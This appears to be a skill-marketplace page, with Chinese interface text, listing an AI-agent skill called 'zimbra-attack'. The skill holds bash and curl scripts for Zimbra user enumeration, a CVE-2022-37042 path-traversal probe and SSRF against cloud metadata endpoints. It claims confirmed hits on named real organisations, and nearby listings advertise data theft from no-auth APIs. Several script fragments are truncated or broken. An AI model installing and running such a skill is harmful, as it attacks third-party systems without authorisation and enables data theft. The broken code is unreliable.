用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/Wyl-cmd/kxns-cli --skill zimbra-attack命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
Hermes Agent features guide — cron, delegation, memory, automation, YOLO mode, dual-agent hunting, and slash commands for the agentiko Telegram setup
Worker container environment — tools, paths, and usage patterns for the remote SSH terminal
Exploit no-auth APIs for data theft and CRUD via probes.
基于 SOC 职业分类
正在显示 SKILL.md
| name | zimbra-attack |
| description | Zimbra SOAP user enum, CVE-2022-37042, SSRF when webmail. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei |
| metadata | {"tags":["recon","zimbra","SOAP","user-enum","CVE","email"],"category":"recon","related_skills":["exchange-owa-attack","port-service-discovery","subdomain-enumeration"]} |
Zimbra Collaboration Suite attack surface — SOAP API user enumeration without authentication, version fingerprinting, UploadServlet path traversal (CVE-2022-37042), /service/proxy internal SSRF, and Admin console access. Confirmed on IGN Argentina (Zimbra 8.8.11, admin user confirmed, UploadServlet active), gov-finance-portal (Zimbra webmail, SOAP auth functional), and ITERJ (Zimbra webmail active).
webmail., mail., or zimbra. subdomains./zimbra/ path on mail server.subdomain-enumeration discovers webmail hosts.terminal tool with curl, python3.https://webmail.target.com).# Quick Zimbra detection
curl -skI "https://TARGET/" | grep -iE "zimbra|zmail"
# SOAP user enumeration
curl -sk -X POST "https://TARGET/service/soap/" \
-H "Content-Type: application/xml" \
-d '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra"/></soap:Header><soap:Body><AuthRequest xmlns="urn:zimbraAccount"><account by="name">admin@TARGET</account><password>test</password></AuthRequest></soap:Body></soap:Envelope>'
| Endpoint | What It Reveals | Risk |
|---|---|---|
/service/soap/ | SOAP API — user enum, auth testing | High |
/service/soap/AuthRequest | Differentiates valid user vs bad password | High |
/zimbraAdmin/ | Admin console (if exposed) | Critical |
/service/upload?fmt=ext | UploadServlet (CVE-2022-37042) | Critical |
/service/proxy?target= | Internal SSRF | Critical |
/service/extension/ | Extension listing | Medium |
/zimbra/downloads/index.html | Version disclosure | Medium |
/zimbra/skins/_base/logos/LoginBanner.png | Zimbra branding confirmation | Info |
TARGET="$1"
OUTDIR="/root/output/zimbra"
mkdir -p "$OUTDIR"
echo "[*] Zimbra detection on $TARGET"
# Check for Zimbra redirect/headers
INITIAL=$(curl -skI --max-time 10 "https://$TARGET/" 2>/dev/null)
if echo "$INITIAL" | grep -qi "zimbra\|zmail"; then
echo "[+] Zimbra confirmed in headers"
fi
# Check page title
TITLE=$(curl -sk --max-time 10 "https://$TARGET/" 2>/dev/null | grep -oP '<title>\K[^<]+')
if echo "$TITLE" | grep -qi "zimbra"; then
echo "[+] Zimbra confirmed — Title: $TITLE"
fi
# Version from download page
VER=$(curl -sk --max-time 10 "https://$TARGET/zimbra/downloads/index.html" 2>/dev/null | grep -oP 'Zimbra[^<]+' | head -1)
if [[ -n "$VER" ]]; then
echo "[+] Version: $VER"
fi
# Version from SOAP response
SOAP_RESP=$(curl -sk -X POST --max-time 10 "https:///service/soap/" \
-H \
-d 2>/dev/null)
ZIMBRA_VER=$( | grep -oP )
ZIMBRA_RELEASE=$( | grep -oP )
[[ -n ]];
TARGET="$1"
echo "[*] SOAP user enumeration on $TARGET"
# Test users
USERS=("admin" "administrator" "spam" "ham" "virus" "galsync" "wiki"
"user" "webmaster" "info" "contato" "suporte" "test")
for user in "${USERS[@]}"; do
# AuthRequest with wrong password — differentiates valid vs invalid user
RESP=$(curl -sk -X POST --max-time 5 "https://$TARGET/service/soap/" \
-H "Content-Type: application/xml" \
-d "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"/></soap:Header><soap:Body><AuthRequest xmlns=\"urn:zimbraAccount\"><account by=\"name\">$user@$TARGET_DOMAIN</account><password>wrongpass</password></AuthRequest></soap:Body></soap:Envelope>" 2>/dev/null)
if echo "$RESP" | grep -q "authentication failed"; then
echo " [VALID] $user — user EXISTS (wrong password)"
elif echo "$RESP" | grep -q "no such account"; then
echo
| grep -q ;
TARGET="$1"
echo "[*] CVE-2022-37042 check (UploadServlet path traversal)"
# This CVE allows unauthenticated file write via path traversal in UploadServlet
# Affects: Zimbra < 9.0.0 P27, < 8.8.15 P34
UPLOAD_RESP=$(curl -sk -X POST --max-time 10 "https://$TARGET/service/upload?fmt=extended" \
-H "Content-Type: application/octet-stream" \
-d "test" 2>/dev/null)
if echo "$UPLOAD_RESP" | grep -qi "upload\|success\|clientToken"; then
echo " [+] UploadServlet ACTIVE — CVE-2022-37042 potentially exploitable"
echo " Response: $(echo "$UPLOAD_RESP" | head -1)"
# Test path traversal (doesn't write — just tests if the endpoint processes it)
TRAVERSAL_RESP=$(curl -sk -X POST --max-time 10 "https://$TARGET/service/upload?fmt=extended&lbfums=" \
-H "Content-Type: application/octet-stream" \
-d "../../../../../../opt/zimbra/jetty/webapps/zimbra/public/test.jsp" 2>/dev/null)
if echo "$TRAVERSAL_RESP" | grep -qi "success"; then
echo " [CRITICAL] Path traversal appears functional"
fi
else
echo " [-] UploadServlet not accessible (patched or blocked)"
fi
TARGET="$1"
echo "[*] Internal SSRF via /service/proxy"
# Zimbra proxy endpoint allows internal HTTP requests
# Requires LOW-privilege auth, but worth probing unauthenticated
PROXY_TARGETS=(
"http://localhost:8080/"
"http://127.0.0.1:7071/" # Zimbra Admin port
"http://127.0.0.1:22/"
"http://169.254.169.254/latest/meta-data/" # AWS IMDS
"http://metadata.google.internal/"
)
for pt in "${PROXY_TARGETS[@]}"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 \
"https://$TARGET/service/proxy?target=${pt}" 2>/dev/null)
if [[ "$code" == "200" || "$code" == "500" ]]; then
echo " [SSRF] $pt → HTTP $code (internal service may be reachable)"
fi
done
TARGET="$1"
echo "[*] Zimbra Admin console check"
ADMIN_CODE=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 "https://$TARGET/zimbraAdmin/" 2>/dev/null)
if [[ "$ADMIN_CODE" == "200" ]]; then
echo " [+] Zimbra Admin console EXPOSED"
elif [[ "$ADMIN_CODE" == "302" ]]; then
LOCATION=$(curl -skI --max-time 5 "https://$TARGET/zimbraAdmin/" 2>/dev/null | grep -i "location:" | sed 's/.*: //')
echo " [REDIR] Admin console redirects to: $LOCATION"
else
echo " [-] Admin console: HTTP $ADMIN_CODE"
fi
# Check port 7071 (Zimbra Admin port, sometimes exposed without reverse proxy)
ADMIN_PORT=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 "https://$TARGET:7071/zimbraAdmin/" 2>/dev/null)
[[ "$ADMIN_PORT" == "200" ]] && echo " [CRITICAL] Admin console on port 7071 EXPOSED"
admin confirmed via SOAP AuthRequest/zimbraAdmin/ returns HTTP 500 (partial exposure)/service/soap/ and /service/soap/LoginRequest active| Version | CVE | Impact |
|---|---|---|
| < 8.8.15 P34 | CVE-2022-37042 | Auth bypass via UploadServlet path traversal (RCE) |
| < 9.0.0 P27 | CVE-2022-37042 | Auth bypass via UploadServlet path traversal (RCE) |
| < 8.8.15 P41 | CVE-2023-37580 | Reflected XSS in /public/login.jsp |
| < 8.8.15 P33 | CVE-2022-27925 | Admin console RCE via mboximport (authenticated) |
| 8.8.15 | CVE-2022-30333 | Arbitrary file write via Amavis (RCE) |